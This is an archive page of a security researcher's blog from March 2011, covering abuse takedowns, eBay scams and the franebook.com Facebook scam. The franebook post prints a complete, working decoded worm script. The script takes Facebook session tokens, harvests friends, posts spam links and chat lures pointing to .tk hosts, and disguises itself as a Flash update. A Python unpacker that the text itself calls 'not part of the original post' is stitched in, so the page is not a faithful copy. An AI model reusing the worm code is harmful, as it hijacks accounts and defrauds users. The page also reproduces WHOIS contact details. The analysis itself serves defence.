Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 16 March 2011

Take downs: The good, the bad - and RapidSwitch

Taking down malicious sites has been part of daily life for years now, and I still love every second of it. Primarily because it annoys the bad guys, but mostly because it means there are fewer malicious sites (for a second anyway) for people to get infected via.

Over the years, there have been many changes in the responses from hosting companies and registrars. GoDaddy have become one of the best at take downs and cleanups, courtesy of my good friend William (GoDaddy abuse dept). DirectI are challenging FreeHostia for the title of "quickest to respond to and action an abuse report" (record currently held by FreeHostia at an unbelievable 4 minutes!), having responded to and actioned an abuse report in under 6 minutes (GoDaddy are close to beating this too, depending on when the report is sent in).

Sadly however, some things never change. .co.cc still doesn't appear to have put any measures in place to prevent the bad guys misusing its service. Dot.tk still won't take down a malicious domain if the registrant has paid for it, and NameCheap and eNom STILL seem to be willingly allowing malicious domains to be registered through them (evident from eNom's lack of response, and NameCheap's refusal to take action, regardless of the domain in question, on the basis that they're "only the registrar").

The most hilarious however, is RapidSwitch, who I blogged about back in 2008 and a few more times since. They still have me blocked, which prevents my sending abuse reports to them (or it would if I only had one e-mail address). Little hint, RapidSwitch: blocking abuse reports does one thing and one thing only - it guarantees you'll keep the title of crime-ware friendly and continue to have your IP ranges blocked! I'm not sure your customers are going to be happy about that (I look forward to hearing the excuse you're going to give them).

I also noted, along with co.cc, another ccTLD registrar that's seemingly doing nothing to stop the rising number of hostnames being created via its service: ce.ms. Though, given it's run by cz.cc, this perhaps isn't very surprising. It is important to note, of course, that the issues here aren't caused by their offering the domains for free (evident from there being far more abuse on paid TLDs such as .com); they're caused both by their complete failure to put preventive measures in place, and by their seemingly allowing bulk/scripted registrations (a problem ALL registrars have).

In an effort not to bore you to death, I'm keeping this short, but look for further updates in the future regarding this.

References

Take downs and cleanups: The good, and the rest
http://hphosts.blogspot.com/2010/12/take-downs-and-cleanups-good-and-rest.html

Tuesday 15 March 2011

hpHosts: Scheduled downtime

Just a note folks. The hpHosts website and forums will be offline between 20:00 - 21:30 PST for maintenance.

That's 06:00 this morning for us in the UK btw ;o)

Saturday 12 March 2011

eBay: Do you read before bidding/buying?

Sites such as eBay are extremely useful for finding that wonderful collectable, part, or a multitude of other things you've been meaning and wanting to buy for yourself.

Sadly however, as with many other sites, there are those on these sites that are doing as much as possible to part you from your money. There are millions of legit users on there, just like yourself, but don't forget - there are also scammers and other questionable people on there, and unless you read things properly before bidding/buying, you could end up being stung.

For example, you wouldn't be too happy if you bid on what appeared to be a very cheap laptop, only to note when it arrived, that it was actually just a photo of the laptop (the familiar "exactly as pictured" scam).

Similarly, there's finding that great product that appears to be at an unbelievable price. I came across one such product a couple of days ago: a twin Makita drill set, with case and battery etc., that appeared to be extremely cheap at only £7.50 - then I noticed the postage - a very unbelievable £65.


I reported it to eBay, and it has since become apparent that the reason for this is that the person selling it wants to try and scam eBay out of some of the fees they'd have had to pay had they sold it at the "normal" price (i.e. £65 for the drill set, and £7.50 for the postage).


eBay charge fees for selling things so they can keep the site running, so trying to scam them out of part of the fees by using practices such as this hurts not only eBay, but you - the user.

A different listing I came across the same day offered what appeared to be a great collection of furniture, at a similarly great price of just £99 - but when you read the actual product details, you found out you weren't buying the furniture shown in the image; the image was actually just an example of things the seller had allegedly created.

I could ramble on about the various different scams and scammers on eBay, but you'd end up getting bored inside of 5 minutes, so to keep it short, the lesson here is to ensure you read not only the product details, but the postage costs. It is also VERY important that you read the seller's "feedback" (click the numbers shown in brackets next to the seller's name), as this will tell you whether or not you can trust the seller.

If you see a listing using methods like this (excessive postage, or claiming to sell products when in fact they're selling "services"), or anything else, ensure you report it so eBay can take action.

Friday 11 March 2011

Fake scanner that DOESN'T lead to a fake AV?

That certainly appears to be the case with a site I came across today. The following, if loaded in a browser, displays what we're used to seeing when a site wants to infect our machine with a fake AV;

www(.)sosgt.com/indexm.php

In this case however, we're given a purchase page.

Clicking to proceed to the checkout takes us to;

hxxps://secureonlinestore.net/secureorder/orders.php



In case you're wondering, this is actually just a frame that loads;

https://usd.swreg.org/cgi-bin/s.cgi?s=43835&p=43835-199&q=1&v=0&d=0&a=affilsos&vp=19.95

The SSL cert for secureonlinestore.net itself is provided by RapidSSL;

CN = secureonlinestore.net
OU = Domain Control Validated - RapidSSL(R)
OU = See www.rapidssl.com/resources/cps (c)11
OU = GT15704604
O = secureonlinestore.net
C = LI
SERIALNUMBER = a0LzVzEMmQs9-BozcBuk7r-4WnS5MWJI

Details for both sites;

sosgt.com

IP: 94.75.233.51
IP PTR: vpn5.vzihostmz.com
ASN: 16265 94.75.192.0/18 LEASEWEB LEASEWEB AS

Registration Service Provided By: Unpicked.com
Contact:
Visit: http://www.unpicked.com

Domain name: sosgt.com

Registrant Contact:
-
Alen Aniston (31alenaniston@gmail.com)

Fax:
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Administrative Contact:
-
Alen Aniston (31alenaniston@gmail.com)
+420.2495614
Fax: +420.2495614
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Technical Contact:
-
Alen Aniston (31alenaniston@gmail.com)
+420.2495614
Fax: +420.2495614
Gaikar 22
Referral URL:www.unpicked.com
Prague, CZ 21991
CZ

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 27 Feb 2011 19:03:00
Expiration date: 27 Feb 2012 14:03:00


secureonlinestore.net

IP: 213.133.101.29
IP PTR: 213-133-101-29.clients.your-server.de
ASN: 24940 213.133.96.0/19 HETZNER-AS Hetzner Online AG RZ

Registration Service Provided By: Unpicked.com
Contact:
Visit: http://www.unpicked.com

Domain name: secureonlinestore.net

Registrant Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)

Fax:
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Administrative Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Technical Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 04 Feb 2011 10:22:00
Expiration date: 04 Feb 2012 05:22:00

Wednesday 9 March 2011

Franebook.com: An update - part 3

Second verse, same as the first. Same registrar, same registrant, same multi-residential IP setup, same content - same everything.



The IP list count currently stands at 63, so if it is a botnet, it's a relatively small one compared to others.



References:

franebook: An update - Part 2
http://hphosts.blogspot.com/2011/03/franebookcom-update-part-2.html

franebook: An update
http://hphosts.blogspot.com/2011/03/franebook-update.html

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

Tuesday 8 March 2011

Franebook.com: An update - part 2

Just came across another lovely lot, all created March 7th, all registered using eNom (surprise surprise), all registered to Vlad Marks / vladmarks@yahoo.ca, and all with the same content and MO as the last lot.



And the IPs for this lovely lot;



References:

franebook: An update
http://hphosts.blogspot.com/2011/03/franebook-update.html

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

franebook: An update

Normally I get very annoyed with myself when I miss one of Chris Boyd's blogs. This time however, I'm partially glad I did, as otherwise I may have missed what I've just found.

Going over some of the stuff he found, I decided to do a bit more digging, and not only has franebook.com come back to life - the bad guys behind it have gotten themselves some new domains, all associated with a single name server - dark-dns-services.com;

Domain Name.......... dark-dns-services.com
Creation Date........ 2011-02-12 11:34:29
Registration Date.... 2011-02-12 11:34:29
Expiry Date.......... 2012-02-12 11:34:29
Organisation Name.... huang xinyi
Organisation Address. yuanlinlu57
Organisation Address.
Organisation Address. nantong
Organisation Address. 226051
Organisation Address. JS
Organisation Address. CN

Admin Name........... huangxinyi
Admin Address........ yuanlinlu57
Admin Address........
Admin Address........ nantong
Admin Address........ 226051
Admin Address........ JS
Admin Address........ CN
Admin Email.......... shangmenwei@163.com
Admin Phone.......... +86.51385051689
Admin Fax............ +86.51385051689

Tech Name............ huangxinyi
Tech Address......... yuanlinlu57
Tech Address.........
Tech Address......... nantong
Tech Address......... 226051
Tech Address......... JS
Tech Address......... CN
Tech Email........... shangmenwei@163.com
Tech Phone........... +86.51385051689
Tech Fax............. +86.51385051689

Bill Name............ huangxinyi
Bill Address......... yuanlinlu57
Bill Address.........
Bill Address......... nantong
Bill Address......... 226051
Bill Address......... JS
Bill Address......... CN
Bill Email........... shangmenwei@163.com
Bill Phone........... +86.51385051689
Bill Fax............. +86.51385051689
Name Server.......... ns5.dark-dns-services.com
Name Server.......... ns4.dark-dns-services.com
Name Server.......... ns2.dark-dns-services.com
Name Server.......... ns1.dark-dns-services.com


franebook.com itself is seemingly serving content via only 2 URLs at present, though no doubt that will change in the near future;

www(dot)franebook.com/usa/index14.php
www(dot)franebook.com/usa/app3/js.php

index14.php, as you see in the screenshot above (top left), is the phishing side of it. js.php contains the following bit of loveliness;


egoneweight201|Is|video|getridoftime9|minifeed|your|hell|in|doing|4294967295|Date|alert|error|Supported|franebook|app3|usa|to_offline|pvs_time|client_time|getTime|msg_id|msg_text|num_tabs|dialog|What|nodeValue|firstChild|confirmed|typeahead|filter|first_degree|1034|v10|installation|Flash|round|Installing|updated|Receiving|options|removeChild|3000|firstName|friends_only|amp|u00253A|weithajs2|setTimeout|buddy_list|force_render|popped_out|uid'.split('|')))


Which decodes to (formatted for readability);

function gXMLO()
{
var x=false;
if(window.XMLHttpRequest)
{
x=new window.XMLHttpRequest()
}
else
{
x=new ActiveXObject('Microsoft.XMLHTTP')
}
return x
}
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
if(!Array.prototype.indexOf)
{
Array.prototype.indexOf=function(obj,fromIndex)
{
if(fromIndex==null)
{
fromIndex=0
}
else if(fromIndex<0)
{
fromIndex=Math.max(0,this.length+fromIndex)
}
for(var i=fromIndex,j=this.length;i<j;i++)
{
if(this[i]===obj)return i
}
return-1
}
}
function include(arr,obj)
{
return(arr.indexOf(obj)!=-1)
}
function sL()
{
var hid=document.getElementsByTagName('head')[0];
var css=document.createElement('link');
css.type='text/css';
css.rel='stylesheet';
css.href=b+'style.css';
css.media='screen';
hid.appendChild(css);
var l=document.createElement('div');
l.setAttribute('id','LoadingDiv');
l.setAttribute('style','display:block; position:absolute; top: 0; right: 0; bottom: 0; left: 0;');
var i=document.createElement('img');
i.setAttribute('src',b+'flash.png');
i.setAttribute('style','padding-left: 50%; margin-left: -128px;');
l.appendChild(i);
var s='text-align: center; color: #FFFFFF; padding-top: ';
var i=document.createElement('div');
i.setAttribute('id','WarningDiv');
var p=document.createElement('P');
p.setAttribute('style',s+'10px; font-weight: bolder; font-size: 9pt;');
var t=document.createTextNode('Caution: Do Not Interrupt');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
var i=document.createElement('img');
i.setAttribute('src',b+'ajax-loader.gif');
i.setAttribute('style','padding-top: 16px; padding-left: 50%; margin-left: -110px;');
l.appendChild(i);
var i=document.createElement('div');
i.setAttribute('id','ProgressDiv');
var p=document.createElement('P');
p.setAttribute('id','txtc');
p.setAttribute('style',s+'13px;');
var t=document.createTextNode('Loading..');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
document.body.appendChild(l);
window.onbeforeunload=function()
{
return'If you abort the update process now you will corrupt your Adobe Flash installation!'
};
return
}
function cT()
{
var perc=0;
if(wc)
{
perc=Math.round(wc/wtot*100)
}
if(tOP)
{
msg='Installing'
}
else
{
msg='Receiving'
}
var txt=perc+'% updated. '+msg+' update (v10.1034) from Adobe';
var txto=document.getElementById("txtc");
txto.firstChild.nodeValue=txt
}
function hL()
{
var l=document.getElementById('LoadingDiv');
document.body.removeChild(l);
window.onbeforeunload=false;return
}
function s2(res)
{
var m=res.match('"viewer":([^"]+),"token":"([^"]+)"');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/ajax/typeahead/first_degree.php?__a=1&viewer='+vw+'&token='+m[2]+'&filter[0]=user&options[0]=friends_only',false,'s3',false)
}
function s3(res)
{
nms=new Array();
ids=new Array();
var re=/"uid":([^"]+),"type":"user","text":"([^"]+)"/g;
var m;
while(m=re.exec(res))
{
if(m[1]!=vw)
{
tc+=1;
ids.push(m[1]);
nms.push(m[2])
}
}
wtot=nms.length+wtot;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function sIM(res)
{
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var m=res.match('"viewer":([^"]+),"token":');
if(!m||!fbsg||!pfid)
{
return dN()
}
var vw=m[1];
var p='fb_dtsg='+fbsg[1]+'&force_render=true&post_form_id='+pfid[1]+'&lsd&popped_out=false&post_form_id_source=AsyncRequest&user='+vw;var hs=new hS('/ajax/chat/buddy_list.php?__a=1',p,'sIM2',false)
}
function dSU(res)
{
var m=res.match('"viewer":([^"]+),"token":');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/profile.php?id='+vw+'&sk=wall',false,'dSU2',false)
}
function dSU2(res)
{
var tt='Click Here';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://weithajs2.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+vw+'&targetid='+vw+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dSU3',vr)
}
function dSU3(res,vr)
{
var re=/name="([^"]+)" value="([^"]+)"/g;
var p,m,ic,a,s;
var msg='I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too';
var tt=vr[3];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vw+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dSU4',false)
}
function dSU4(res)
{
sIM(document.body.innerHTML)
}
function sIM2(res)
{
nms=new Array();
ids=new Array();
var re=/"([^"]+)":{"i":/g;
var m;
while(m=re.exec(res))
{
ids.push(m[1])
}
var re=/"([^"]+)":{"name":"([^"]+)","firstName"/g;
while(m=re.exec(res))
{
if(include(ids,m[1]))
{
nms.push(m[2])
}
}
if(!nms)
{
return dN()
}
wtot=nms.length;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function dN()
{
if(!tOP)
{
tOP=1;
cb=0;
s2(document.body.innerHTML)
}
else
{
setTimeout("hL();",3000)
}
return
}
function wT()
{
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
function gW(id,p)
{
var hs=new hS('/profile.php?id='+id,false,p,id)
}
function cU(res,id)
{
res=res.replace(/&amp;/g,'&').replace(/%/g,'');
var re=/ministory_key=(.*?)&profile_fbid=(.*?)&story_type=(.*?)&feedback=1&action_key=remove_content&story_fbids(.*?)=(.*?)u00253A(.*?)&story_id=(.*?)"/g;
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var m;
while(m=re.exec(res))
{
var p='action_key=remove_content&confirmed=1&dialog=1&fb_dtsg='+fbsg[1]+'&feedback=1&lsd&ministory_key='+m[1]+'&nctr[_mod]=pagelet_tab_content&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&profile_fbid='+m[2]+'&story_fbids[0]='+m[5]+':'+m[6]+'&story_id='+m[7]+'&story_type='+m[3];var hs=new hS('/ajax/minifeed.php?__a=1',p,'pV',false)
}
pV()
}
function dWP(id,nm)
{
var vr=new Array(id,nm);
var hs=new hS('/profile.php?id='+id+'&sk=wall',false,'dWPL',vr)
}
function dWPL(res,vr)
{
var id=vr[0];
var nm=vr[1];
var tt='Click Here!';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://getridoftime9.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+id+'&targetid='+id+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],id,nm,tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dWPL2',vr)
}
function dIM(res,id,nm)
{
var msg='Hey, What the hell are you doing in this video? Is this dancing or what?? Bahahaha http://begoneweight201.tk';
var mid=(Math.floor(Math.random()*4294967295)+1).toString();
var tme=new Date().getTime().toString().replace('.','');
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var p='client_time='+tme+'&fb_dtsg='+fbsg[1]+'&lsd&msg_id='+mid+'&msg_text='+escape(msg)+'&num_tabs=1&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&pvs_time&to='+id+'&to_offline=false';var hs=new hS('/ajax/chat/send.php?__a=1',p,'dF',false)
}
function dWPL2(res,vr)
{
var re=/name="([^"]+)" value="([^"]+)"/g;
var p,m,ic,a,s;
var nm=vr[4];
var msg='Hey I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too!';
var tt=vr[5];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vr[3]+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dF',true)
}
function dF(res,w)
{
if(res.search('"error":0,')!=-1)
{
wc+=1;
cT()
}
if(w)
{
gW(vw,'cU')
}
else
{
pV()
}
}
function pV()
{
if(ids.length)
{
var id=ids.pop();
var nm=nms.pop();
if(tOP)
{
dWP(id,nm)
}
else
{
dIM(document.body.innerHTML,id,nm)
}
}
else
{
if(cb!=wt)
{
cb+=1
}
else
{
dN()
}
}
}
pV()
}
var xO=new gXMLO();
if(!xO)
{
alert('XMLHttpRequest Not Supported')
}
else
{
var ids=new Array();
var nms=new Array();
var vw;
var wc=0;
var wt=2;
var tc=0;
var cb=0;
var b='http://franebook.com/usa/app3/';
var tOP=0;
var wtot=0;
sL();
if(navigator.userAgent.search('Firefox/3')!=-1||navigator.userAgent.search('Firefox/4')!=-1||navigator.userAgent.search('MSIE 8')!=-1||navigator.userAgent.search('MSIE 9')!=-1)
{
wt=6
}
pool=new Array();
dSU(document.body.innerHTML)}
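The tail of the packed blob above is the argument list of Dean Edwards' p,a,c,k,e,d JavaScript packer: the payload, the radix (10), the word count (373) and the '|'-separated dictionary, so each decimal token in the payload is an index into that dictionary ('10' is 'var', '31' is 'hS', '52.43' is 'profile.php'). As an added example that is not part of the original post, here is a Python unpacker that reproduces the decoding step behind the listing above; it is exercised on a constructed harmless sample rather than on the blob itself.

```python
import re

# Prologue of Dean Edwards' "p,a,c,k,e,d" JavaScript packer; some builds name
# the last parameter r instead of d.
PACKER_SIGNATURE = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")

# Digit alphabet used by the packer's encoder: 0-9, then a-z, then A-Z (radix up to 62).
_DIGITS = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def is_packed(script: str) -> bool:
    """True when the script carries the packer's eval(function(p,a,c,k,e,d) prologue."""
    return PACKER_SIGNATURE.search(script) is not None


def decode_index(token: str, radix: int):
    """Turn an encoded word token back into its dictionary index, or None when the
    token is not a valid base-`radix` number in the packer's alphabet."""
    value = 0
    for ch in token:
        digit = _DIGITS.find(ch)
        if digit < 0 or digit >= radix:
            return None
        value = value * radix + digit
    return value


def _scan_js_string(src: str, pos: int):
    """Read a single-quoted JS string literal starting at src[pos]; return (text, next_pos)."""
    if pos >= len(src) or src[pos] != "'":
        raise ValueError("expected a single-quoted string at offset %d" % pos)
    out, i = [], pos + 1
    simple = {"n": "\n", "r": "\r", "t": "\t"}
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src):
            nxt = src[i + 1]
            out.append(simple.get(nxt, nxt))  # \' -> ', \\ -> \, \/ -> /, \n -> newline
            i += 2
        elif ch == "'":
            return "".join(out), i + 1
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated string literal")


def extract_packer_args(script: str):
    """Pull (payload, radix, count, words) out of the trailing
    }('payload',radix,count,'w1|w2|...'.split('|'),0,{})) call."""
    start = script.rfind("}('")
    if start < 0:
        raise ValueError("no packer argument list found")
    payload, pos = _scan_js_string(script, start + 2)
    m = re.compile(r"\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*").match(script, pos)
    if not m:
        raise ValueError("radix/count arguments not found")
    radix, count = int(m.group(1)), int(m.group(2))
    dictionary, pos = _scan_js_string(script, m.end())
    if not script.startswith(".split('|')", pos):
        raise ValueError("dictionary is not followed by .split('|')")
    return payload, radix, count, dictionary.split("|")


def unpack(payload: str, radix: int, count: int, words: list) -> str:
    """Replay the packer's substitution: every word token that decodes to an index with a
    non-empty dictionary entry is replaced by that entry; anything else is left as-is."""
    def substitute(m):
        token = m.group(0)
        idx = decode_index(token, radix)
        if idx is None or idx >= count or idx >= len(words) or not words[idx]:
            return token
        return words[idx]
    return re.sub(r"\b\w+\b", substitute, payload)


def unpack_script(script: str) -> str:
    """Check the prologue, extract the arguments and unpack one layer."""
    if not is_packed(script):
        raise ValueError("not a p,a,c,k,e,d packed script")
    return unpack(*extract_packer_args(script))


# Constructed sample (not the blog's blob): a harmless two-statement script packed with
# radix 10 and a 17-entry dictionary, laid out like the tail shown on the page.
SAMPLE_PACKED = (
    "eval(function(p,a,c,k,e,d){/* packer body omitted */return p}("
    "'10 11=12(\\'13 14\\');10 15=11.16',10,17,"
    "'||||||||||var|greeting|String|Hello|World|count|length'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack_script(SAMPLE_PACKED))
```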


Did you see it? The lovely loading of a .tk site;

weithajs2.tk

This goes on to load (in order);

1. pegasusstar.info/iuko.php

2. dancewithrico.info/weight7.php

3. jump.cttrk.com/aff_c?offer_id=3276&aff_id=1764

4. jump.cttrk.com/aff_r?offer_id=3276&aff_id=1764&url=http%3A%2F%2Ftrack.yourrewardinside.com%2FDefaultPage.aspx%3Fnm%3D014gjfq2jkxp%26s%3D1764e

5. track.yourrewardinside.com/DefaultPage.aspx?nm=014gjfq2jkxp&s=1764e

6. www.tracklead.net/click.track?CID=134785&AFID=138362&ADID=367060&SID=

7. fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

8. www.fatcatrewards.com/uk/bonuscash/?l=1031&p=138362

So including pegasusstar.info and dancewithrico.info, the list now stands at (excluding the .tk site, and the sites you're redirected to such as jump.cttrk.com);

dark-dns-services.com    huang xinyi / shangmenwei@163.com    BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
cantiq.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
ipadapps4you.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
globalamc.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
loungeinthesky.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
joytronic.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
knowledge-library.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pelletterie2f.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
sinsung.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
spampro.info    Vlad Marks / vladmarks@yahoo.ca    eNom, Inc. (R126-LRMS)
pegasusstar.info/iuko.php    Louis Pierra / louispierra@yahoo.ca    eNom, Inc. (R126-LRMS)
dancewithrico.info    Greg Wilson / gwilsonmtl88@yahoo.com    eNom, Inc. (R126-LRMS)
grapillse.com    Vasileva Svetlana / VasilevaSvetlana@mail.com    Namecheap.com
limedicg.com    Gilmutdinov Iskander / GilmutdinovIskander@mail.com    Namecheap.com
franebook.com/usa/app3/js.php    Uhb Xjj / zzkmwc4@126.com    XIN NET TECHNOLOGY CORPORATION


So far, the IPs associated with the newly created domains, along with the IPs for franebook.com, all appear to be residential IPs, leading to the likelihood of its being associated with a botnet (though that's speculation at present; I'm still checking). The IP details are;


/update 11:16

dot.tk have now suspended weithajs2.tk.

References:

Facebook app pages serve up Javascript and Acai Berry spam
http://sunbeltblog.blogspot.com/2011/03/facebook-app-pages-serve-up-javascript.html

Saturday 5 March 2011

Eset: Here’s my support desk!

I guess someone in the general area of Kolkata reads my blog posts. At any rate, after I posted a blog yesterday bemoaning the fact that I had to do my own systems support, I got a phone call from a gentleman with a pronounced accent wanting to help me with my virus problem.

It's Raining Men (And Wooden Horses)

You didn't know I had a virus problem? Neither did I, but he assured me that I was spraying malware all over the part of town I live and work in. Well, I suppose that explains why I tripped over a Conficker and got fake AV all over my trousers on the way back from the library. And he quoted an address that was near enough to mine to convince someone who didn't know about telephone directories.

The People's Flag Is Deepest Red

So I asked him how he knew that my system was infected. He explained that my IP address was flashing red on his screen. I asked him what my IP address was, and he explained that he couldn't tell me that for security reasons, but he'd put me through to his supervisor.


Read the full story over at the Eset blog;

http://blog.eset.com/2011/03/04/heres-my-support-desk

References:

Info: Telephone scammers still coming to a phone near you!
http://hphosts.blogspot.com/2011/03/info-telephone-scammers-still-coming-to.html

Thursday 3 March 2011

Info: Telephone scammers still coming to a phone near you!

